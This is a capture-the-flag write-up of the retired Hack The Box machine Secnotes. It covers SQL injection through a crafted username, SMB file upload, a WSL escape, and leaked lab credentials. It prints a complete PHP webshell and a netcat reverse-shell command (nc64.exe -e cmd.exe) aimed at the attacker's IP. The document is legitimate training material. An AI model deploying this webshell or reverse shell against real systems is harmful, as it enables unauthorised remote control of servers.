Secnotes Write-up (HTB)
This is a write-up for the recently retired Secnotes machine on the Hack The Box platform. If you don’t already know, Hack The Box is a website where you can further your cybersecurity knowledge by hacking into a range of different machines.
TL;DR: SQLi & WSL Escape | I did this box a few months ago, so the commentary on it may be a little rusty. It’s clear that it was popular, since it wasn’t voted out for so long. The main attack vectors in this were SQL Injection through the login field, and then escaping through cleartext passwords in the Windows Subsystem for Linux.
PART ONE: USER
Let’s begin with an nmap scan:
It seems like there are only two services running on this box: HTTP & SMB. We can also see that the webserver is running Microsoft IIS, which is definitely important to note.
Visiting the website shows a login screen, with the option to create an account:
I initially tried some simple logins (such as admin/admin or admin/password) but didn’t get anywhere. So, I decided to create an account with the details user123/password123 and see what’s inside. The basic functionality of the website is as follows:
There are a few important functions to take from this:
- We can create/delete notes
- We can change our own password
- We can contact the owner
My first discovery on here was that we could perform XSS on any of the fields:
Since we have an option to send forms to the owner, I tried forming a cookie-stealing XSS that would steal an administrator’s cookie, however after leaving it for a while, I never received a call back.
I then tried to do some SQLi on the PHPSESSID cookie, and some SQLi on the initial login, but got nowhere through this. Since I’d hit a dead end, I gave up for that evening.
When I came back to the box, I decided to try a method that I had seen whilst reading through a write-up of an older box, Nightmare. In this, SQLi was achieved through creating an account with a username in which the SQL injection took place.
Let’s give this a go by creating an account with the username user’ OR 1=1#:
With this now created, we can log in and view all the notes!
Whilst Mimi’s Sticky Buns and TestNote were useless, the other two were interesting:
It looks like we’ve found some SMB credentials! We can now connect to the server like so:
george@kali:~/htb/secnotes$ smbclient -U tyler \\\\10.10.10.97\\new-siteEnter WORKGROUP\tyler's password: 92g!mA8BGjOirkL%OG*&Try "help" to get a list of possible commands.smb: \> pwdCurrent directory is \\10.10.10.97\new-site\smb: \> ls. D 0 Sat Sep 8 18:59:16 2018.. D 0 Sat Sep 8 18:59:16 2018iisstart.htm A 696 Thu Jun 21 11:26:03 2018iisstart.php A 78 Sat Sep 8 18:57:36 2018iisstart.png A 98757 Thu Jun 21 11:26:03 201812978687 blocks of size 4096. 7860782 blocks availablesmb: \>
This is strange — we have some IIS files that we haven’t come across yet. After attempting some further enumeration on this service, I decided to rescan the system to see if our initial nmap scan had missed anything:
Here, we can wee a port that didn’t appear before: 8808. Attempting to connect to this port reveals that it’s running as a website:
As such, let’s visit this in the browser:
Since we’ve now found the default IIS page (iisstart.htm), we can assume that the SMB server serves the pages for this site. We can test this theory by uploading a simple “test.html” webpage:
From here it’s trivial to upload a PHP reverse shell and therefore perform RCE. I used this really short script as my webshell:
<form action="rce.php" method="get"><input type="text" name="cmd"><input type="submit"><?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die;}?>
With this uploaded, we can now run commands:
Since we have read access, we can go ahead and read the user flag:
PART TWO: ROOT
It would definitely be far easier to move on from here with a “proper” shell, so we should try to upgrade to that. For this to happen, I first passed nc64.exe into the new-site directory through the SMB client, and then set up a reverse shell. To set up this shell, I entered…
nc64.exe -e cmd.exe 10.10.14.214 4444
…into the webshell, and waited to catch it with netcat:
With a proper shell now in place, we can begin enumerating. Before long, I found a strange folder in the C:\ directory:
C:\>dirVolume in drive C has no label.Volume Serial Number is 9CDD-BADADirectory of C:\06/21/2018 03:07 PM <DIR> Distros06/21/2018 06:47 PM <DIR> inetpub06/22/2018 02:09 PM <DIR> Microsoft04/11/2018 04:38 PM <DIR> PerfLogs06/21/2018 08:15 AM <DIR> php708/19/2018 02:56 PM <DIR> Program Files06/21/2018 06:47 PM <DIR> Program Files (x86)06/21/2018 03:07 PM 201,749,452 Ubuntu.zip06/21/2018 03:00 PM <DIR> Users08/19/2018 11:15 AM <DIR> Windows09/09/2018 03:25 AM 0 __output2 File(s) 201,749,452 bytes9 Dir(s) 32,515,137,536 bytes freeC:\>
It’s strange that we’d have a distros folder in a Windows machine, so it seems like this may be what we’re looking for. In the distros folder, there was one other folder: Ubuntu.
C:\Distros\Ubuntu>dirVolume in drive C has no label.Volume Serial Number is 9CDD-BADADirectory of C:\Distros\Ubuntu09/09/2018 02:53 AM <DIR> .09/09/2018 02:53 AM <DIR> ..07/11/2017 06:10 PM 190,434 AppxBlockMap.xml07/11/2017 06:10 PM 2,475 AppxManifest.xml06/21/2018 03:07 PM <DIR> AppxMetadata07/11/2017 06:11 PM 10,554 AppxSignature.p7x06/21/2018 03:07 PM <DIR> Assets06/21/2018 03:07 PM <DIR> images07/11/2017 06:10 PM 201,254,783 install.tar.gz07/11/2017 06:10 PM 4,840 resources.pri06/21/2018 05:51 PM <DIR> temp07/11/2017 06:10 PM 222,208 ubuntu.exe07/11/2017 06:10 PM 809 [Content_Types].xml7 File(s) 201,686,103 bytes6 Dir(s) 32,515,235,840 bytes freeC:\Distros\Ubuntu>
Launching ubuntu.exe just makes the shell hang, and eventually die. I did some research on this folder for a while, and found out that this is part of the WSL (Windows Subsystem for Linux). Since we’re trying to look for ways to get into this, I searched for some other ESL-related files:
Directory of C:\Windows\System32: 114,688 wsl.exeDirectory of C:\Windows\WinSxS\amd64_microsoft-windows-lxss-wsl_31bf3856ad364e35_10.0.17134.1_none_686f10b5380a84cf: 114,688 wsl.exeDirectory of C:\Windows\System32: 115,712 bash.exeDirectory of C:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.17134.1_none_251beae725bc7de5: 115,712 bash.exeDirectory of C:\Distros\Ubuntu: 222,208 ubuntu.exe
I then ran the wsl.exe file, which gave us a shell (the python command simply upgrades us to a TTY shell):
As part of the usual Linux enumeration, I checked the .bash_history file and found the following:
The administrator SMB credentials are there! Let’s copy this command into our own terminal:
And with that, the box is complete!
Contact me:
Personal Website
Github
Hack The Box